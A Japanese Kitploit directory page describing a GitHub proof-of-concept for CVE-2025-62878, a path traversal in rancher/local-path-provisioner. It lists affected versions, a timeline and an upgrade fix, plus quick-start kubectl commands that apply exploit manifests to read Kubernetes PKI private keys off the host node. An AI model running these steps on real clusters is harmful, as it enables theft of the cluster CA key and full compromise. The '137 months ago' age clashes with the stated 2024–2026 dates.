Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-62878 — CVE-2025-62878 | Kitploit
ツール/GitHubGitHub/kinokopio/cve-2025-62878
コンテナセキュリティ脆弱性分析エクスプロイトクラウドセキュリティ設定ミス学習と教育ラボと実践
GitHubkinokopio/cve-2025-62878

CVE-2025-62878

CVE-2025-62878

リポジトリを見る
137ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ウェブサイト

CVE-2025-62878: Local Path Provisioner パストラバーサル

概要

項目値
CVE IDCVE-2025-62878
GHSA IDGHSA-jr3w-9vfr-c746
深刻度クリティカル (CVSS 10.0)
CWECWE-23 (相対パストラバーサル)
影響を受けるコンポーネントrancher/local-path-provisioner
影響を受けるバージョンv0.0.27 ~ v0.0.32
修正バージョンv0.0.33+

脆弱性の説明

StorageClass の pathPattern パラメータにパストラバーサル脆弱性が存在します。悪意のあるユーザーは相対パス要素(例: ../)を使用して pathPattern を操作し、設定されたベースディレクトリ制限をバイパスして、ホストノード上の任意の場所を指す PersistentVolume を作成できます。

これにより攻撃者は以下のことが可能になります:

  • 機密性の高いホストファイルへのアクセス(例: /etc/kubernetes/pki/)
  • 重要なシステムファイルの上書き
  • Kubernetes CA 秘密鍵の窃取によるクラスター全体の完全な侵害

影響を受けるバージョン(確認済み)

注記: 公式の GitHub Advisory では "< 0.0.34" が影響を受けるとされていますが、弊社のテストにより以下が確認されています:

  • v0.0.33 は既にパッチが適用されています
  • v0.0.26 およびそれ以前は影響を受けません(pathPattern 機能が存在しないため)
  • 実際の影響範囲: v0.0.27 <= バージョン <= v0.0.32

タイムライン

イベント日付
pathPattern 機能の導入2024-05-26 (コミット af85381)
最初の脆弱性リリース (v0.0.27)2024-05-29
修正コミット2025-12-24 (コミット 1ed6b54)

再現方法

詳細な再現手順とスクリプトについては exploit/ ディレクトリを参照してください。

クイックスタート

root@kitploit:~
# 1. Install vulnerable version
kubectl apply -f https://raw.githubusercontent.com/rancher/local-path-provisioner/v0.0.30/deploy/local-path-storage.yaml

# 2. Apply exploit
kubectl apply -f exploit/malicious-storageclass.yaml
kubectl apply -f exploit/malicious-pvc.yaml
kubectl apply -f exploit/exploit-pod.yaml

# 3. Verify exploitation
kubectl get pv -o jsonpath='{.items[0].spec.hostPath.path}'
# Output: /etc/kubernetes/pki

kubectl exec pki-exploit-pod -- ls -la /stolen-pki/
# Shows Kubernetes PKI certificates and private keys

修復方法

v0.0.33 以降にアップグレードしてください:

root@kitploit:~
kubectl apply -f https://raw.githubusercontent.com/rancher/local-path-provisioner/v0.0.33/deploy/local-path-storage.yaml

参照

  • GitHub Advisory GHSA-jr3w-9vfr-c746
  • 修正コミット 1ed6b54
  • pathPattern 機能コミット af85381
ツールをダウンロード
バージョンリリース日pathPattern サポート脆弱性
v0.0.262023-12-03なし安全 (機能なし)
v0.0.272024-05-29あり脆弱
v0.0.282024-06-19あり脆弱
v0.0.292024-09-03あり脆弱
v0.0.302024-10-07あり脆弱
v0.0.312025-01-24あり脆弱
v0.0.322025-07-31あり脆弱
v0.0.332025-12-25あり修正済み
v0.0.342026-01-06あり修正済み
最初のパッチ適用リリース (v0.0.33)2025-12-25
CVE 公開2026-02-04